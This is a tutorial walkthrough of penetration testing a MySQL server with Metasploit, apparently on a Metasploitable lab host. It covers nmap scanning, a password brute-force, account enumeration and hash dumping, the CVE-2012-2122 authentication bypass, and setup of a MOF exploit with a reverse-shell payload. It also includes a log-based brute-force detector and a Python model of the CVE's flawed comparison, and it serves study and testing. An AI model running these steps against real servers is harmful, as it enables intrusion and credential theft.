Use Metasploit to perform penetration testing on MySQL


Preface

This article walks through a simple penetration test of a MySQL server using Metasploit.


1. db_nmap scan

You can use either an external nmap or Metasploit's built-in db_nmap. To use db_nmap (which stores its results in the Metasploit database), you first need to start the postgresql service.

1.1 Commonly used nmap parameters

Target discovery

-iL <file>  Read the list of target IPs from a file
-iR <num>  Choose targets at random
With no target given, nmap picks the requested number of IPs worldwide at random; here 100 hosts are scanned on port 100:
root@kali:~# nmap -iR 100 -p100
--exclude <hosts>  Exclude hosts from the scan
Useful when you want to scan an address range but skip specific IPs within it:
root@kali:~# nmap 192.168.1.0/24 --exclude 192.168.1.1-100
--excludefile <file>  Exclude the IPs listed in a file from the scan

Host discovery

-sn  Ping scan only, no port scan
-Pn  Skip host discovery and treat every host as up (useful when ping probes are blocked by a firewall)
-PS/PA/PU/PY[portlist]  Host discovery with TCP SYN, TCP ACK, UDP or SCTP probes to the given ports
-PO[protocol list]  Host discovery with IP protocol probes
-n / -R
-n: never do DNS resolution
-R: always do reverse DNS resolution
--dns-servers <serv1[,serv2],...>  Specify custom DNS servers
Using a DNS server other than the system default can give different scan results:
root@kali:~# nmap --dns-servers 8.8.8.8 www.sina.com
--traceroute  Trace the route to each host, roughly equivalent to the traceroute command:
root@kali:~# nmap www.baidu.com --traceroute -p80

Port discovery

-sS/sT/sA/sW/sM  TCP-based port scans: SYN, Connect(), ACK, Window and Maimon scans
-sU  UDP scan; UDP results are noticeably less reliable
-sN/sF/sX  TCP Null, FIN and Xmas scans
--scanflags <flags>  The TCP scans above are all just combinations of TCP flag bits, so you can define your own combination
-sI <zombie host[:probeport]>  Idle (zombie) scan
-sY/sZ  SCTP INIT and COOKIE-ECHO scans (rarely used)
-b <FTP relay host>  FTP bounce scan

Port specification and scan order

-p <ports>  Scan specific ports or port ranges
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports <ports>  Exclude the given port ranges from the scan
-F  Fast mode: scan fewer ports than the default scan
-r  Scan ports consecutively, don't randomize
If we scan ports 1-1000, nmap picks the order at random by default; -r makes it go through them in sequence.
--top-ports <n>  Scan only the n most common ports

Service/version detection

-sV  Probe open ports to determine service and version information, matching against nmap's large signature database
--version-intensity <level>  -sV matches against a large signature database, which adds to the scan time; lowering the intensity limits the probes tried and keeps the scan as short as possible
--version-trace  Show detailed version-detection activity as the scan runs

1.2 Procedure

┌──(root💀kali)-[~]
└─# service postgresql start

┌──(root💀kali)-[~]
└─# msfconsole

       =[ metasploit v6.0.46-dev                          ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with irb

msf6 > db_nmap -sS -A 192.168.1.112
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 20:39 CST
[*] Nmap: Nmap scan report for 192.168.1.112
[*] Nmap: Host is up (0.00018s latency).
[*] Nmap: Not shown: 978 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open  bindshell   Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 10
[*] Nmap: |   Version: 5.0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 3893
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: )@EwKP0?+WU'_-]o8g"l


msf6 > services -u
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.1.112   3306  tcp    mysql         open   MySQL 5.0.51a-3ubuntu5

msf6 > 

Output that is not relevant to this article has been trimmed to save space.

2. Check the MySQL version

This step uses the auxiliary/scanner/mysql/mysql_version module.

2.1 Module description

       Name: MySQL Server Version Enumeration
     Module: auxiliary/scanner/mysql/mysql_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  kris katterjohn <[email protected]>

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    3306             yes       The target port (TCP)
  THREADS  200              yes       The number of concurrent threads (max one per host)

Description:
  Enumerates the version of MySQL servers.

There are three options: RHOSTS (the target IP), RPORT (the target port) and THREADS (the number of concurrent threads). More threads make the scan faster, but set too many and the scan can overwhelm the scanner or the target.

2.2 Procedure

msf6 > search mysql_version

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_version                   normal  No     MySQL Server Version Enumeration


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_version

msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_version) > options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/mysql/mysql_version) > setg rhosts 192.168.1.112
rhosts => 192.168.1.112
msf6 auxiliary(scanner/mysql/mysql_version) > setg threads 200
threads => 200
msf6 auxiliary(scanner/mysql/mysql_version) > run

[+] 192.168.1.112:3306    - 192.168.1.112:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

3. Brute-force the password

3.1 Module description

      Name: MySQL Login Utility
     Module: auxiliary/scanner/mysql/mysql_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Bernardo Damele A. G. <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE         passwords.txt    no        File containing passwords, one per line
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             3306             yes       The target port (TCP)
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           200              yes       The number of concurrent threads (max one per host)
  USERNAME          root             no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module simply queries the MySQL instance for a specific 
  user/pass (default is root with blank).

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0502

Several options matter here, some already covered above. PASSWORD is a single database password to try; if you already know (or have cracked) the password, set it here. PASS_FILE is a password dictionary, a text file with one password per line. USERNAME and USER_FILE work the same way for usernames.

3.2 Procedure

msf6 auxiliary(scanner/mysql/mysql_version) > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

msf6 auxiliary(scanner/mysql/mysql_version) > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           200              yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > setg pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

I won't go into the details of the brute-force run here; the output is too long.
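From the defender's side, a dictionary run like the one above (mysql_login with THREADS set to 200) shows up as a burst of failed logins from one source. The following Python detector is an added example, not part of the original post; it assumes the server's error log records "Access denied" lines in the MySQL 5.7-style format (log_error_verbosity=3), and the sample log lines are constructed.

```python
"""Detect MySQL login brute-force bursts from error-log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# MySQL 5.7+ error-log style "Access denied" note.
# Assumption: this regex matches that line format; adjust it for other server versions.
ACCESS_DENIED = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[Note\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)' \(using password: (?P<pw>YES|NO)\)"
)

# Constructed sample: a multi-threaded dictionary run from 192.168.1.113 plus normal noise.
SAMPLE_LOG = """\
2021-06-04T12:39:01.100000Z 40 [Note] Access denied for user 'root'@'192.168.1.113' (using password: NO)
2021-06-04T12:39:01.120000Z 41 [Note] Access denied for user 'root'@'192.168.1.113' (using password: YES)
2021-06-04T12:39:01.130000Z 42 [Note] Access denied for user 'root'@'192.168.1.113' (using password: YES)
2021-06-04T12:39:01.150000Z 43 [Note] Access denied for user 'root'@'192.168.1.113' (using password: YES)
2021-06-04T12:39:01.200000Z 44 [Note] Access denied for user 'root'@'192.168.1.113' (using password: YES)
2021-06-04T12:39:01.210000Z 45 [Note] Access denied for user 'guest'@'192.168.1.113' (using password: YES)
2021-06-04T12:40:30.000000Z 46 [Note] Access denied for user 'app'@'192.168.1.50' (using password: YES)
2021-06-04T12:45:00.000000Z 47 [Note] Access denied for user 'app'@'192.168.1.50' (using password: YES)
2021-06-04T12:45:05.000000Z 48 [Warning] IP address '192.168.1.113' could not be resolved
"""


def parse_failures(text):
    """Yield (timestamp, user, host) for every access-denied line; other lines are ignored."""
    for line in text.splitlines():
        m = ACCESS_DENIED.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
            yield ts, m.group("user"), m.group("host")


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Sliding window per source host: raise one alert for a host once `threshold`
    failures land within `window_seconds`. Returns a list of alert dicts with the
    host, first/last timestamp of the triggering window, the count and all usernames tried."""
    windows = defaultdict(deque)   # host -> timestamps of recent failures
    users = defaultdict(set)       # host -> usernames attempted
    alerts = {}
    for ts, user, host in parse_failures(text):
        q = windows[host]
        q.append(ts)
        users[host].add(user)
        # Drop failures that have fallen out of the window.
        while q and ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()
        if len(q) >= threshold and host not in alerts:
            alerts[host] = {"host": host, "first": q[0], "last": ts, "count": len(q)}
    return [dict(a, users=sorted(users[a["host"]])) for a in alerts.values()]


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        span = (a["last"] - a["first"]).total_seconds()
        print(f"{a['host']}: {a['count']} failures in {span:.2f}s, users tried {a['users']}")
```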

4. Collect information

4.1 Enumerate database information

① Module description

       Name: MySQL Enumeration Module
     Module: auxiliary/admin/mysql/mysql_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             no        The password for the specified username
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  USERNAME  root             no        The username to authenticate as

Description:
  This module allows for simple enumeration of MySQL Database Server 
  provided proper credentials to connect remotely.

References:
  https://cisecurity.org/benchmarks.html

This module performs simple enumeration of a MySQL database server, given valid credentials to connect remotely.

② Procedure

The module is auxiliary/admin/mysql/mysql_enum.

msf6 auxiliary(scanner/mysql/mysql_login) > search mysql_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_enum                   normal  No     MySQL Enumeration Module


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum

msf6 auxiliary(scanner/mysql/mysql_login) > use 0
msf6 auxiliary(admin/mysql/mysql_enum) > options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_enum) > setg username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > setg password qwer
password => qwer
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.1.112

[*] 192.168.1.112:3306 - Running MySQL Enumerator...
[*] 192.168.1.112:3306 - Enumerating Parameters
[*] 192.168.1.112:3306 -        MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.1.112:3306 -        Compiled for the following OS: debian-linux-gnu
[*] 192.168.1.112:3306 -        Architecture: i486
[*] 192.168.1.112:3306 -        Server Hostname: metasploitable
[*] 192.168.1.112:3306 -        Data Directory: /var/lib/mysql/
[*] 192.168.1.112:3306 -        Logging of queries and logins: OFF
[*] 192.168.1.112:3306 -        Old Password Hashing Algorithm OFF
[*] 192.168.1.112:3306 -        Loading of local files: ON
[*] 192.168.1.112:3306 -        Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.1.112:3306 -        Allow Use of symlinks for Database Files: YES
[*] 192.168.1.112:3306 -        Allow Table Merge: YES
[*] 192.168.1.112:3306 -        SSL Connections: Enabled
[*] 192.168.1.112:3306 -        SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.1.112:3306 -        SSL Key: /etc/mysql/server-key.pem
[*] 192.168.1.112:3306 -        SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.1.112:3306 - Enumerating Accounts:
[*] 192.168.1.112:3306 -        List of Accounts with Password Hashes:
[+] 192.168.1.112:3306 -                User: debian-sys-maint Host:  Password Hash: 
[+] 192.168.1.112:3306 -                User: root Host: % Password Hash: *2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 -                User: guest Host: % Password Hash: 
[*] 192.168.1.112:3306 -        The following users have GRANT Privilege:
[*] 192.168.1.112:3306 -                User: debian-sys-maint Host: 
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > 

4.2 Dump password hashes

① Module description

       Name: MYSQL Password Hashdump
     Module: auxiliary/scanner/mysql/mysql_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             no        The password for the specified username
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  THREADS   200              yes       The number of concurrent threads (max one per host)
  USERNAME  root             no        The username to authenticate as

Description:
  This module extracts the usernames and encrypted password hashes 
  from a MySQL server and stores them for later cracking.

This module dumps the account password hashes, within the privileges of the account used to log in.

② Procedure

msf6 auxiliary(admin/mysql/mysql_enum) > search mysql_hashdump

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_hashdump                   normal  No     MYSQL Password Hashdump
   1  auxiliary/analyze/crack_databases                        normal  No     Password Cracker: Databases


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/analyze/crack_databases

msf6 auxiliary(admin/mysql/mysql_enum) > sue 0
[-] Unknown command: sue.
msf6 auxiliary(admin/mysql/mysql_enum) > use 0
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  qwer             no        The password for the specified username
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   200              yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_hashdump) > run

[+] 192.168.1.112:3306    - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.1.112:3306    - Saving HashString as Loot: root:*2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306    - Saving HashString as Loot: guest:
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_hashdump) > 

5. MySQL authentication bypass (CVE-2012-2122)

5.1 Module description

       Name: MySQL Authentication Bypass Password Dump
     Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-06-09

Provided by:
  theLightCosine <[email protected]>
  jcran <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  THREADS   200              yes       The number of concurrent threads (max one per host)
  USERNAME  root             yes       The username to authenticate as

Description:
  This module exploits a password bypass vulnerability in MySQL in 
  order to extract the usernames and encrypted password hashes from a 
  MySQL server. These hashes are stored as loot for later cracking.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-2122
  OSVDB (82804)
  https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

This module exploits CVE-2012-2122. An instance of it was found during a test of NetEase and reported to NSRC.

This is a probabilistic authentication bypass: with any password for a known user, roughly one login attempt in 256 succeeds, according to the advisory. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are vulnerable.

CVE ID: CVE-2012-2122
MariaDB is a database server that is an alternative to MySQL; MySQL is an open source database.
MariaDB before 5.1.62, 5.2.12, 5.3.6 and 5.5.23, and MySQL before 5.1.63, 5.5.24 and 5.6.6, mishandle user authentication, which can let an attacker log in to the MySQL server without knowing the correct password.
When a client connects to MariaDB/MySQL, the server computes the authentication token and compares it with the one the client sent. Because of an incorrect type conversion, the comparison can be treated as a match even when memcmp() returns a non-zero value, so MySQL/MariaDB wrongly concludes that the password is correct. Since the protocol uses a random salt, the bug triggers with a probability of about 1/256. Whether a given MySQL build is affected depends on how it was compiled; many builds (including the official binaries) are not affected.
In other words, as long as you know a username and keep trying, you can log in to the database directly; according to the advisory, about one attempt in 256 succeeds.
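To make the "incorrect type conversion" concrete, here is an added Python model of the check (not the page's or MySQL's own code): it implements the mysql_native_password token scheme that produces the `*`-prefixed hashes dumped above, then runs the stored-hash comparison both with the pre-fix behaviour (the memcmp() result returned through a char) and with the fixed one. The word-difference memcmp stand-in is an assumption that models affected builds, and the salt constant reuses the 20 bytes shown in the nmap mysql-info output.

```python
"""Model of the CVE-2012-2122 token comparison (added example, not the page's code)."""
import hashlib
import random

SHA1_HASH_SIZE = 20
# The 20-byte scramble shown in the page's nmap mysql-info output, reused as a fixed salt.
PAGE_SALT = b')@EwKP0?+WU\'_-]o8g"l'


def mysql_native_stored_hash(password: bytes) -> str:
    """Stored form in mysql.user: '*' + hex(SHA1(SHA1(password))), the format seen on the page."""
    return "*" + hashlib.sha1(hashlib.sha1(password).digest()).hexdigest().upper()


def client_token(password: bytes, salt: bytes) -> bytes:
    """mysql_native_password client side: SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw)))."""
    stage1 = hashlib.sha1(password).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mask = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mask))


def word_difference_memcmp(a: bytes, b: bytes) -> int:
    """Stand-in for an optimised memcmp() that returns a 32-bit word difference instead
    of -1/0/1. Assumption: this models the affected builds; real libc behaviour varies."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            wa = int.from_bytes((a[i:i + 4] + b"\0\0\0")[:4], "big")
            wb = int.from_bytes((b[i:i + 4] + b"\0\0\0")[:4], "big")
            return wa - wb
    return 0


def to_my_bool(cmp: int) -> int:
    """The C cast (my_bool) cmp, my_bool being a char: only the low 8 bits survive."""
    low = cmp & 0xFF
    return low - 256 if low > 127 else low


def vulnerable_compare(expected: bytes, actual: bytes) -> bool:
    """Pre-fix check_scramble(): the int from memcmp() is returned through a char, so any
    difference that is a multiple of 256 truncates to 0 and is taken as a match."""
    return to_my_bool(word_difference_memcmp(expected, actual)) == 0


def fixed_compare(expected: bytes, actual: bytes) -> bool:
    """Post-fix check_scramble(): test the full int, so only an exact match passes."""
    return word_difference_memcmp(expected, actual) == 0


def server_check(stored_hash: str, salt: bytes, token: bytes, compare) -> bool:
    """Server side: unmask the client's token back to SHA1(pw), hash it once more and
    compare with the stored SHA1(SHA1(pw)) using the supplied comparison function."""
    stage2 = bytes.fromhex(stored_hash[1:])
    mask = hashlib.sha1(salt + stage2).digest()
    stage1 = bytes(a ^ b for a, b in zip(token, mask))
    return compare(stage2, hashlib.sha1(stage1).digest())


def false_accept_counts(attempts: int, seed: int = 1) -> tuple:
    """Replay `attempts` logins with a wrong password, each with a fresh random salt as a
    new connection would get, and count how many logins each comparison accepts."""
    rng = random.Random(seed)
    stored = mysql_native_stored_hash(b"qwer")  # the page's demo password
    vuln = fixed = 0
    for _ in range(attempts):
        salt = bytes(rng.randrange(256) for _ in range(SHA1_HASH_SIZE))
        token = client_token(b"not-the-password", salt)
        vuln += server_check(stored, salt, token, vulnerable_compare)
        fixed += server_check(stored, salt, token, fixed_compare)
    return vuln, fixed


if __name__ == "__main__":
    v, f = false_accept_counts(5000)
    print(f"wrong-password logins accepted: vulnerable={v}, fixed={f} (expect about 1/256 vs 0)")
```

The first byte that differs forces memcmp() to be non-zero, but the cast only keeps the low byte, which is why the model reproduces the roughly 1-in-256 acceptance the advisory describes.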

5.2 Procedure

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search mysql_auth

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  No     MySQL Authentication Bypass Password Dump


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use 0
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   200              yes       The number of concurrent threads (max one per host)
   USERNAME  root             yes       The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] 192.168.1.112:3306    - 192.168.1.112:3306 The server allows logins, proceeding with bypass test
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 10% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 20% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 30% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 40% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 50% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 60% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 70% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 80% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 90% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 100% complete
[-] 192.168.1.112:3306    - 192.168.1.112:3306 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

6. MOF privilege escalation

6.1 Module description

       Name: Oracle MySQL for Microsoft Windows MOF Execution
     Module: exploit/windows/mysql/mysql_mof
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-12-01

Provided by:
  kingcope
  sinn3r <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   MySQL on Windows prior to Vista

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             yes       The password to authenticate with
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  USERNAME  root             yes       The username to authenticate as

Payload information:

Description:
  This module takes advantage of a file privilege misconfiguration 
  problem specifically against Windows MySQL servers (due to the use 
  of a .mof file). This may result in arbitrary code execution under 
  the context of SYSTEM. This module requires a valid MySQL account on 
  the target machine.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-5613
  OSVDB (88118)
  https://www.exploit-db.com/exploits/23083
  https://seclists.org/fulldisclosure/2012/Dec/13

6.2 Procedure

msf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/mysql/mysql_writable_dirs                         normal     No     MYSQL Directory Write Test
   1   auxiliary/scanner/mysql/mysql_file_enum                             normal     No     MYSQL File/Directory Enumerator
   2   auxiliary/scanner/mysql/mysql_hashdump                              normal     No     MYSQL Password Hashdump
   3   auxiliary/scanner/mysql/mysql_schemadump                            normal     No     MYSQL Schema Dump
   4   auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     No     MySQL Authentication Bypass Password Dump
   5   auxiliary/admin/mysql/mysql_enum                                    normal     No     MySQL Enumeration Module
   6   auxiliary/scanner/mysql/mysql_login                                 normal     No     MySQL Login Utility
   7   auxiliary/admin/mysql/mysql_sql                                     normal     No     MySQL SQL Generic Query
   8   auxiliary/scanner/mysql/mysql_version                               normal     No     MySQL Server Version Enumeration
   9   exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow
   10  exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow
   11  exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow
   12  exploit/multi/mysql/mysql_udf_payload              2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution
   13  exploit/windows/mysql/mysql_start_up               2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   14  exploit/windows/mysql/mysql_mof                    2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution
   15  auxiliary/analyze/crack_databases                                   normal     No     Password Cracker: Databases
   16  auxiliary/admin/http/rails_devise_pass_reset       2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset


Interact with a module by name or index. For example info 16, use 16 or use auxiliary/admin/http/rails_devise_pass_reset

msf6 exploit(multi/mysql/mysql_udf_payload) > use 14
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mysql/mysql_mof) > options

Module options (exploit/windows/mysql/mysql_mof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  qwer             yes       The password to authenticate with
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME  root             yes       The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

